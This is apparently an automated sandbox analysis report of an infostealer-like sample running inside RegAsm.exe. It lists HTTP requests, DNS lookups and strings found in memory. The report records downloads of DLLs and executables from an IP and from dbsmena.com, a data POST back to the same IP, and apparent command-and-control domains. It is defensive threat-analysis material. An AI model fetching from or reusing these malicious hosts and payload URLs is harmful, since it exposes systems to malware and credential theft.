Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ljhgfsd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: dbsmena.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vdshfd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: dbsmena.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache

Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: error #D12nline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: dbsmena.com
Source: global traffic	DNS traffic detected: DNS query: ghostreedmnu.shop
Source: global traffic	DNS traffic detected: DNS query: gutterydhowi.shop
Source: global traffic	DNS traffic detected: DNS query: offensivedzvju.shop
Source: global traffic	DNS traffic detected: DNS query: vozmeatillu.shop
Source: global traffic	DNS traffic detected: DNS query: drawzhotdog.shop
Source: global traffic	DNS traffic detected: DNS query: fragnantbui.shop
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic	DNS traffic detected: DNS query: stogeneratmns.shop
Source: global traffic	DNS traffic detected: DNS query: reinforcenh.shop
Source: global traffic	DNS traffic detected: DNS query: ballotnwu.site

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, FIEHIIIJDA.exe.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, FIEHIIIJDA.exe.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, FIEHIIIJDA.exe.4.dr, softokn3.dll.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegAsm.exe, 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.CGCBKECAAAEB
Source: RegAsm.exe, 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: RegAsm.exe, 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: RegAsm.exe, 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.CAAAEB
Source: RegAsm.exe, 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: RegAsm.exe, 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgAEB
Source: file.exe, 00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: RegAsm.exe, 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoECAAAEB
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, FIEHIIIJDA.exe.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, FIEHIIIJDA.exe.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, FIEHIIIJDA.exe.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, FIEHIIIJDA.exe.4.dr, softokn3.dll.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, FIEHIIIJDA.exe.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, FIEHIIIJDA.exe.4.dr, softokn3.dll.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, FIEHIIIJDA.exe.4.dr, softokn3.dll.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, FIEHIIIJDA.exe.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, FIEHIIIJDA.exe.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, FIEHIIIJDA.exe.4.dr, softokn3.dll.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr, nss3.dll.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, FIEHIIIJDA.exe.4.dr, ljhgfsd[1].exe.4.dr, vdshfd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000004.00000002.2779917513.000000001C3CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788378705.000000002236D000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://5.75.211.162
Source: RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162.exe
Source: RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/
Source: RegAsm.exe, 00000010.00000002.3154731112.000000000113D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/-
Source: RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/ECGCAEBFI
Source: RegAsm.exe, 00000010.00000002.3154731112.000000000113D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/L
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/ff
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/freebl3.dll
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/freebl3.dllia
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/mozglue.dll9ap
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/mozglue.dll_a
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/msvcp140.dll7az
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/msvcp140.dllAa
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/nss3.dll
Source: RegAsm.exe, 00000010.00000002.3154731112.000000000113D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/q
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/softokn3.dll
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/softokn3.dllga
Source: RegAsm.exe, 00000010.00000002.3151894747.000000000055E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dll
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dll%
Source: RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dllW1
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/vcruntime140.dll
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/vcruntime140.dllmc
Source: RegAsm.exe, 00000010.00000002.3151894747.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.1620.5938.132
Source: RegAsm.exe, 00000010.00000002.3151894747.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162FBGHC
Source: RegAsm.exe, 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162IJKFB
Source: RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162JDAKF
Source: RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162ta
Source: EGIDHD.4.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
